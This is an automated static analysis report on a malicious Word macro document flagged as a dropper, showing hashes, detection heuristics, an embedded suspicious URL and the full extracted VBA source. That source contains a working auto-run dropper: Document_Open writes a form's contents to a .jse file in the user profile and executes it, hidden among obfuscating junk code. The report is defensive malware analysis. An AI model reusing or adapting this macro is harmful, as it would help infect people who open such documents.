Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 02c51604604a7faa…

MALICIOUS

Office (OOXML)

97.7 KB Created: 2019-08-15 08:10:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-11-12
MD5: 7b16dfe1883419548f6d59954e9f90ce SHA-1: 52337143d11ecd81886528c645b51203433085fe SHA-256: 02c51604604a7faae0b82aab08d9e3693525454be210b73e76294b4594762c78
278 Risk Score

Heuristics 8

  • ClamAV: Doc.Dropper.Sdrop-7182576-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Sdrop-7182576-0
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set Some_FSO_created = CreateObject("Scripting.FileSystemObject")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        s00001 = Environ("USERPROFILE")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://banglaay.com/wp-includes/VRVWLAbrjy/ In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 15488 bytes
SHA-256: 0fac447f000c36d7f6b898385c9ce2b5193a8e144f47ced5bbf2786ce0d28b26
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub RUNFILESTARTOFWORD(name_file, textwrite)
Kh621Sz9p46Z = 1558
UT575539ccc2 = 2793
a304bPg = 6864599
I0FO99u39mhU = 23619
dgaeHrE256 = 77674
    Dim Some_FSO_created As Object
    Set Some_FSO_created = CreateObject("Scripting.FileSystemObject")
       T6uTqU5 = 620222
Brgx86U1z5dm = 6751
mT02B9h082a = 1093
    Dim obj_FSO_CREATED As Object
    Set obj_FSO_CREATED = Some_FSO_created.CreateTextFile(name_file, True, True)
 
P6P5q0kK19 = 2135
    obj_FSO_CREATED.Write textwrite
    j7Ws03CRj = 27910
T3217Z = 1340090
j7Ws03CRj = P6P5q0kK19 + T3217Z
j7Ws03CRj = T6uTqU5 + mT02B9h082a
Kh621Sz9p46Z = T6uTqU5 + Kh621Sz9p46Z
T6uTqU5 = mT02B9h082a + T6uTqU5
a304bPg = dgaeHrE256 + T3217Z
    obj_FSO_CREATED.Close
    
    
    dgaeHrE256 = Brgx86U1z5dm + I0FO99u39mhU
j7Ws03CRj = P6P5q0kK19 + Kh621Sz9p46Z
T6uTqU5 = P6P5q0kK19 + mT02B9h082a
    


End Sub
Sub CountChars2()
    Dim iCount(0 To 255) As Long
    Dim i As Long
    Dim J As Integer
    Dim lCharCount As Long
    Dim sDoc As String
    Dim sTemp As String

    ' Initialize the array
    For i = 0 To 255
        iCount(i) = 0
    Next i
Dim E444LI6 As Boolean
Dim E375X As Boolean
Dim L43x2G3Fi As Boolean
Dim LL9YU22Z18O5 As Boolean
Dim JsAW26 As Boolean
Dim mY33676Xpj1 As Boolean
E444LI6 = True
E375X = True
L43x2G3Fi = False
LL9YU22Z18O5 = True
JsAW26 = False
mY33676Xpj1 = True
E444LI6 = False
E375X = True
mY33676Xpj1 = True
E375X = True
E375X = False
JsAW26 = False
    ' Assign document to a huge string
    lCharCount = ActiveDocument.Characters.Count
    sDoc = ActiveDocument.Range(0, lCharCount)

    ' Fill the array
    For i = 1 To Len(sDoc)
       J = Asc(Mid(sDoc, i, 1))
       iCount(J) = iCount(J) + 1
    Next

    ' Add document for results
    Documents.Add
    Selection.TypeText Text:="ASCII Character Count" & vbCrLf

    ' Only output codes 9 through 255
    For i = 9 To 255
        sTemp = Chr(i)
        If i < 32 Then sTemp = Trim(Str(i))
        sTemp = sTemp & Chr(9) & Trim(Str(iCount(i)))
        sTemp = sTemp & vbCrLf
        Selection.TypeText Text:=sTemp
    Next i
End Sub

Private Sub Document_Open()
    Dim TERRARIUMKOOL As String
    Dim AMSTERDATPARISH As String
    Dim BINGOBONGOASSTRING As String

    Dim runOFSHELLSTART As Object

    Dim GAMMAIZLUCHENIE As Object
Dim w80rZ As String
Dim b2kH950 As String
Dim c2kO02n As String
Dim S8pT434xQG5 As String
Dim symAn As String
Dim c8DJ5867ri1 As String
Dim t1R9387 As String

    Dim s00001 As String
    Dim s00002 As String
    Dim s00003 As String
    w80rZ = "nGxEtD#sKPw*% MmTEoluqA@ewO<slJZ,J?YMQ^t7Cb 2ZFnMG1E 6 l$#uHyraA]@F29. LYZ3c!aU0oaI[OsX,lPK6iINTxed$"
b2kH950 = "w:^6@7UaWY fUM[C??gN^I]9#qr$K;Se7 Eo,RJQwOK$7zesTTRU1aiuBJa*ze#;IyqFNabdg]  iSt33aijmj!7fBWFjFYEWl?m"
Dim MXq9o90AxR As Long
Dim J5112M As Long
Dim K20Ij3700 As Long
Dim Cma1Jq26 As Long
Dim T844Z71 As Long
Dim I732N As Long
c2kO02n = "gflX7Hfh7YCEzF<WHC8cXGgjPBgS  Z jR#[M2%eEAAokIb<YFw9,]^wz2E21A63?%@:%XQ1t1fMJOGG[gqSxKH3Io6?s.R!67qQ"
S8pT434xQG5 = "AXp@wN6eX7LrFSyb.<Hd1Mug#i1nB QpYM@stNdTO2Ptw.M.[UBr2I<cTMHrUZnY]8C0#WHFuXT6!hMFi;SJOd8O%?bnN,NaQb$z"
    Dim s00004 As String
    Dim s00005 As String
  Randomize
 MXq9o90AxR = 2696
J5112M = 9358591
K20Ij3700 = 1620
Cma1Jq26 = 42861
    s00002 = Chr(92)
    s00004 = ".jse"
    s00003 = Rnd
    symAn = "!,:;Q,S< eYDJt;:,0j@;!whHI@Y<lxO iQ7cl@p1uoCDS2mTbzD.qICX:TaLuoU2Q9jX$xE70S,z#Zsn.3Lu2pBiqbs@H@qSgaR"
c8DJ5867ri1 = "x[XAKU]c?0iJNpdxE^bx8H]rY[Q9pxgy.c!qg^MlB2]DayBWjQDS@xNXMbMPhW,i6 e,XL]iEFWBkgoJRO@cCbNlLJo^gh b6AsG"
t1R9387 = "LC;GCNc8b:eF3iFf$37MEDph6gTd@33Buyj.pDbE]r$zznrbkOsGC,m*b7X^Fy$utTky$GHE : B!dx,6@: pT7x$w2s3F;2c:nk"
    s00001 = Environ("USERPROFILE")
    
    s00005 = s00001 & s00002 & s00003 & s00004

    
    c2kO02n = b2kH950 & b2kH950
symAn = b2kH950 & symAn
S8pT434xQG5 = c2kO02n & t1R9387
S8pT434xQG5 = symAn & t1R9387
    
    
    T844Z71 = 5026
I732N = 82858
I732N = MXq9o90AxR + K20Ij3700
Cma1Jq26 = K20Ij3700 + K20Ij3700
    
    TERRARIUMKOOL = s00005
Dim q3Mum9R3s1 As Boolean
Dim xIFC2yy1X59 As Boolean
Dim AM533wm4GI As Boolean
Dim s0244gk As Boolean
Dim bqX2mO8 As Boolean
Dim Od6c3I8L76W6 As Boolean
Dim poh47Z2D9 As Boolean
Dim s73IZ0TQ5 As Boolean
Dim aW69j049d As Boolean
    get_PATHFORSAVE = UserForm1.TextBox1.Value
    
    Cma1Jq26 = MXq9o90AxR + T844Z71
I732N = Cma1Jq26 + J5112M
J5112M = K20Ij3700 + T844Z71
    
RUNFILESTARTOFWORD TERRARIUMKOOL, get_PATHFORSAVE
    xIFC2yy1X59 = True
q3Mum9R3s1 = False
aW69j049d = False
s73IZ0TQ5 = True
xIFC2yy1X59 = False
q3Mum9R3s1 = True

Set runOFSHELLSTART = CreateObject("Shell.Application")
runOFSHELLSTART.ShellExecute (TERRARIUMKOOL)

q3Mum9R3s1 = True
xIFC2yy1X59 = False
AM533wm4GI = True
s0244gk = True
bqX2mO8 = True
Od6c3I8L76W6 = True
poh47Z2D9 = True
s73IZ0TQ5 = False
aW69j049d = False

End Sub
Sub CreateStyleList()
Dim R2pG72 As String
Dim cqMo7Cag7 As String
Dim Z35q06CLK4 As String
Dim U0sco382g4 As String
Dim tyeEM9n014 As String
Dim dbMEd0sHM As String
Dim D2Xh6Zj32g As String
Dim Jw65n7w As String
Dim N9PT6 As String
Dim t3sczN As String
Dim lk97094 As String
Dim o1SbP As String
Dim c3lIW2 As String
    Dim docThis As Document
    Dim styItem As Style
    Dim sBuiltIn(499) As String
    Dim iStyBICount As Integer
    Dim sUserDef(499) As String
    Dim iStyUDCount As Integer
    Dim sInUse(499) As String
    Dim iStyIUCount As Integer
    Dim iParCount As Integer
    Dim J As Integer, K As Integer
    Dim sParStyle As String
    Dim bInUse As Boolean
    
    ' Ref the active document
    Set docThis = ActiveDocument
    
    ' Collect all styles being used
    iStyIUCount = 0
    iParCount = docThis.Paragraphs.Count
    iParOut = 0
    For J = 1 To iParCount
        sParStyle = docThis.Paragraphs(J).Style
        For K = 1 To iStyIUCount
            If sParStyle = sInUse(K) Then Exit For
        Next K
        If K = iStyIUCount + 1 Then
            iStyIUCount = K
            sInUse(iStyIUCount) = sParStyle
        End If
    Next J
    R2pG72 = "ZcY1PC*ZnQ]ke%#8Z]eDN?@OQ<bjcMKQDqAIB%3XTINt1h$n3wjqSS<8geBQD,DkQ#@@baEl*G*[St?BxC0q qt1o9SCukc]ysPl"
cqMo7Cag7 = "l[gQ]gxAlUdCOWTS71P UH#[E?^zXPzmBpGe:yAKS AuFaP6gtdHS8,RwR.a6I^?21xcuYoj,i^6x? ia^gZCg%a C^<Du#A%DGH"
Z35q06CLK4 = ".J?w8!nDJr m2ec$,dntCnr2CUI<XOZuqfCK1E6h*xA.*jXgUd6nF!bP,6Mo.7.fa[PGRE,u2.E*WoXezHbU6tj0PB.n[@zElr0J"
U0sco382g4 = "L%NIjhI$7m sd2Tzqho!zAQN9yP*f*G!@9Q ymJRO<?bpgZ1m7CyF:06upQx!aam]dpl0*HgB7dr1Ww J%$Y0$G hmFc0frkdCoB"
tyeEM9n014 = "gIW:KpDTWFJ0,6Xk3hmcb:Kxc.:1rOGEeCf3de0@ZLE:yKr#!f!k% <f 83fp9pH? 1tW.7;,7!d9M?nued@shJrWfz!89rBo;6 "
dbMEd0sHM = "1uiDa eO]IG.tak j6?%##2Qjhlx# PzK17KPS6eye,pE%?ptC!aRLJTz2Sz,h c ?dHel]ZtDQAu Gr71P.b7LyF:G$S1od!90#"
D2Xh6Zj32g = "!xK7Xit8BWgPm1P 1WxTaz 0oYIF?u6hjPdz<zk pTAy]rLu]g j QnW@eolQ7]JlUAHP6K1dUIh0sWr6Ii0nHJ QhlwtZY6 boo"
Jw65n7w = "LY?Zx9D6PCoPxQ8drwBdwHjs Tq^eBP%1;@qW<D.OlFuQbacc%2ExW;pOH^o]!PKHc;PoG8bNA2cn?d[Yro ;h<m<eB nMjwy:uA"
N9PT6 = "eFjyMEy,rRGO:b$D<X R]T8u0$#Nd.9 K!A OZPG8Y#3;Nb6d2agnq!orRY lAhIAN$]OpW @6z?<Fycbk;q wd9;k#9!.dQ?PZW"
t3sczN = "x0Ywh19urwQ%!tTWP p[OM;hPO*R#Pb1wCTB;Sx6]E^9PwT2nXQ:J@o3uo@<D1Wbfakq%$9ws6t7zgL7w* d9!FRO;anR!ws* JJ"
lk97094 = ";z02!t j@oLz1g^Cw3WsMd* *QafEBHF@XlFKPIXeXc@^C! 2mG r#J ,tBypISn8%F#N]f 107j*8h,]^.3SDARGy2DTr1DXLN?"
o1SbP = "em  ogW81A.at^ L]^Nyl8Zw*B2%RAiD.8P%h2 uFfqo6w%;r$BDynG?BdINn2:Z9MJdUSXkT@pnwzW1@rg0[EjeO;S;FHF$[m1x"
c3lIW2 = "ezFq8<A$gfLcbI!?eiXFB^UNJRx63x8%QK]$@aXG 8J;82c7WF,lje,Q;mId*#gY1 ]G[21XB2$L!^?LBTUB E8RZJWihYQ<M26t"
Z35q06CLK4 = lk97094 & tyeEM9n014
    iStyBICount = 0
    iStyUDCount = 0
    ' Check out styles that are "in use"
    For Each styItem In docThis.Styles
        'see if in those being used
        bInUse = False
        For J = 1 To iStyIUCount
            If styItem.NameLocal = sInUse(J) Then bInUse = True
        Next J
        'Add to those not in use
        If Not bInUse Then
            If styItem.BuiltIn Then
                iStyBICount = iStyBICount + 1
                sBuiltIn(iStyBICount) = styItem.NameLocal
            Else
                iStyUDCount = iStyUDCount + 1
                sUserDef(iStyUDCount) = styItem.NameLocal
            End If
        End If
    Next styItem
    
    'Now create the output document
    Documents.Add
    Dim U2SL0q5J As Long
Dim Sm2CfX6OYyu As Long
Dim EIGIs5sD As Long
Dim gp029yQOX5o As Long
Dim Cl5o903z254 As Long
Dim aZ3ySm0fOw As Long
Dim Pg955uO63B As Long
Dim w8i815U As Long
Dim r22R43 As Long
Dim O5W9XBq As Long
U2SL0q5J = 65206
Sm2CfX6OYyu = 53807
EIGIs5sD = 711317
gp029yQOX5o = 1112664
Cl5o903z254 = 7825949
aZ3ySm0fOw = 32651
Pg955uO63B = 707688
w8i815U = 5390
r22R43 = 8431489
O5W9XBq = 56077
Cl5o903z254 = U2SL0q5J + EIGIs5sD
r22R43 = Cl5o903z254 + Cl5o903z254
aZ3ySm0fOw = O5W9XBq + Cl5o903z254
O5W9XBq = w8i815U + w8i815U
O5W9XBq = Cl5o903z254 + aZ3ySm0fOw
w8i815U = Sm2CfX6OYyu + Pg955uO63B
    Selection.TypeText "Styles In Use"
    Selection.TypeParagraph
    For J = 1 To iStyIUCount
        Selection.TypeText sInUse(J)
        Selection.TypeParagraph
    Next J
    Selection.TypeParagraph
    Selection.TypeParagraph
    
    Selection.TypeText "Built-in Styles Not In Use"
    Selection.TypeParagraph
    For J = 1 To iStyIUCount
        Selection.TypeText sBuiltIn(J)
        Selection.TypeParagraph
    Next J
    Selection.TypeParagraph
    Selection.TypeParagraph
    
    Selection.TypeText "User-defined Styles Not In Use"
    Selection.TypeParagraph
    For J = 1 To iStyIUCount
        Selection.TypeText sUserDef(J)
        Selection.TypeParagraph
    Next J
    Selection.TypeParagraph
    Selection.TypeParagraph
End Sub


Dim Kh621Sz9p46Z As Long
Dim UT575539ccc2 As Long
Dim a304bPg As Long
Dim I0FO99u39mhU As Long
Dim dgaeHrE256 As Long
Dim T6uTqU5 As Long
Dim Brgx86U1z5dm As Long
Dim mT02B9h082a As Long



Dim P6P5q0kK19 As Long
Dim j7Ws03CRj As Long
Dim T3217Z As Long

Sub Correct_Line_Numbers()
    Dim myRng As Range
    Dim StartRng As Range
    Dim iCount As Integer

'if you include the paragraph mark in your selection, then Word
'prints the subsequent line number; not the entire line, just the
'line number; therefore, if the last character of the current
'selection is a paragraph mark, then move the end position of
'the selection to the left by one character
    If Selection.Characters.Last = Chr(13) Then
        Selection.MoveEnd Count:=-1
    End If

    'set the current selection to a variable
    Set myRng = Selection.Range

    'set the start of the document to a variable
    Set StartRng = ActiveDocument.Paragraphs(1).Range

    With Selection
        'go to the beginning of the line for the current selection and
        'set the iCount variable so that it counts the current line
        .HomeKey unit:=wdLine
        iCount = 1

        'if the cursor is not at the beginning of the document
        'then move the cursor up by one line
        'increment iCount by one each time the cursor is not at
        'the beginning of the document
        While Not Selection.InRange(StartRng)
            .MoveUp unit:=wdLine
            iCount = iCount + 1
            'if the cursor is in a table, then the macro should
            'reduce iCount; Word counts an entire table as one line
            If Selection.Rows.Count > 0 Then
                iCount = iCount - 1
            End If
        Wend
    End With

    'reset the starting line number so that it equals the
    'number of times the cursor was moved up by a line
    ActiveDocument.PageSetup.LineNumbering.StartingNumber = iCount

    'reselect the original selection
    myRng.Select

    'print out only the original selection
    ActiveDocument.PrintOut Range:=wdPrintSelection

    'reset the line number(by "undoing" the last two actions
    '[fields update and change line number])
    'so that line numbering begins at one
    ActiveDocument.Undo
    ActiveDocument.Undo

    'reselect the original selection
    myRng.Select
End Sub

Attribute VB_Name = "NewMacros"

Sub CountChars1()
    Dim iCount(0 To 255) As Integer
    Dim i As Integer
    Dim yus0J63p26 As String
Dim X76LT As String
Dim ddkt3W24 As String
Dim Hg4l6456D4Wz As String
Dim d5O6t As String
Dim mah2nl As String
Dim z8f20 As String
Dim t207HlL19tdd As String
Dim dhK2H As String
Dim x0K5u3 As String
Dim AiBK9L780K2 As String
yus0J63p26 = "gwc7p26!uZbMXz]S3kpq<oqEKEASa6k9Ky2A[YUlWo EtR@?]q^Tu0znTcPPL*Q#N nY6Nry7fL2LT@P[l<#:^BX^*;*^7yTTKS@"
X76LT = " ty6SDnGpsQ 9ECgmGsUj@zOpo1QdfAM^bMU0BoQcc7zL%BsOOJnhum!$Y#sjgBNMUA^AWoggbeA@moTw:g$w;KI]$emAhl83O?%"
ddkt3W24 = "]PWC$x7 xehjfjT%H<iO9K]#@:f20NO!P*8RpzfYXunGt]71?gn7W7T72d9cyq IDT.9HXZTNpxC!leWW .S$COLWweDD,EN;,]n"
Hg4l6456D4Wz = "W3!p[D$$eBdWwXO@OejTgDK*[#%Bd:eInhW??0Ei97o1<9?,EWrZsy!Q]EIttlSgjG23obWX3[ 3E%*BfrtHXPp]OKTF.MKIsRKs"
d5O6t = "DYlL:B3jh?G:T3?hF1suNS 1BfG1*hrQKYZ,$EgMitTDWgRRD%R!]dLMrxjHf.w;.,*?X%JI*on@@kj [lHMk9g$mcl91T2Bg8nR"
mah2nl = "yDH.rY@^O MmlTq^Yh6Rn ??2FBm*%sP%8LgneiqY.Xu?7XTuQMx;m2ruX  e bz.L71hBlp,0iGzFRt z,]2WPaCTC *yX0mXXk"
    Dim vCharacter As Variant
    Dim sTemp As String

    ' Initialize the array
    For i = 0 To 255
        iCount(i) = 0
    Next i

    ' Fill the array
    For Each oCharacter In ActiveDocument.Characters
       i = Asc(oCharacter)
       iCount(i) = iCount(i) + 1
    Next

    ' Add document for results
    Documents.Add
    Selection.TypeText Text:="ASCII Character Count" & vbCrLf
z8f20 = "^Wbtm@qb7#y7ENj:!m?RQlZGSs%<Ax!Bm?IRzzDW!6Gw1  bQ0c<xDjLS?#9wdRixLrGO:mK?ukiux dqhFzUM96Am liLG?2]ZX"
t207HlL19tdd = ",M39Ou8YUGzBPjLnUeJMH.qx R*fLjxPqpcWiwKwxOJFq3lEx.NSs7jSOXLiSTy 9:Z;92lh.eGWjG@rpp.b<Gw2.pHzytE#qB6Y"
dhK2H = "sU#NfY69lqhaEZSF 2UM6y:ZY?O^?01]a0;zLM[cRRcu?nT owG^E6OBK^6b.PSdO]^n@JlPCLI^ bN%8ido2YLabU0yc%Wj$,0x"
x0K5u3 = "1! J6!OlOs iP,OMXUpmmz]g:MY2 ESs3Ho3oPCLIR@2X I ozD?*0KaXz[6 31BTlK!0AB ug w8agYEk,. 1ox^m!$c z sLmU"
AiBK9L780K2 = ".C<]rwkDapg1%db$GSa9f%@tUDf3W<sE7yM<GpES:wc$xP8elA!IopTKD*j RN]hxrA<0P[6i9K1Zb2j8N9IB fi8%nw$cEENp2N"
z8f20 = dhK2H & x0K5u3
t207HlL19tdd = d5O6t & d5O6t
x0K5u3 = ddkt3W24 & x0K5u3
x0K5u3 = Hg4l6456D4Wz & ddkt3W24
AiBK9L780K2 = dhK2H & X76LT
d5O6t = X76LT & X76LT
Hg4l6456D4Wz = ddkt3W24 & ddkt3W24
ddkt3W24 = z8f20 & mah2nl
X76LT = d5O6t & d5O6t
    ' Only output codes 9 through 255
    For i = 9 To 255
        sTemp = Chr(i)
        If i < 32 Then sTemp = Trim(Str(i))
        sTemp = sTemp & Chr(9) & Trim(Str(iCount(i)))
        sTemp = sTemp & vbCrLf
        Selection.TypeText Text:=sTemp
    Next i
End Sub

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{F9F82F96-4181-4B13-AB39-5CD5C2335AE2}{EEDA84EE-7C56-4FE1-B025-CBEF03491624}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 134144 bytes
SHA-256: 0951909a231fe35629ea996cd5d72ea4df3ba3eebb8adc787eb62f3e1be667b9
Detection
ClamAV: Doc.Dropper.Sdrop-7182576-0
Obfuscation or payload: likely
1247 of 2059 identifiers look randomly generated (e.g. 'DjMKHwpTCk8KWw6rDgcO8wqRiJMKTVgvCuGVYMHJ') — consistent with name-mangling obfuscation. Carved artifact contains 158 long base64-like blob(s).

Open this report in the interactive analyzer, or submit your own file for analysis.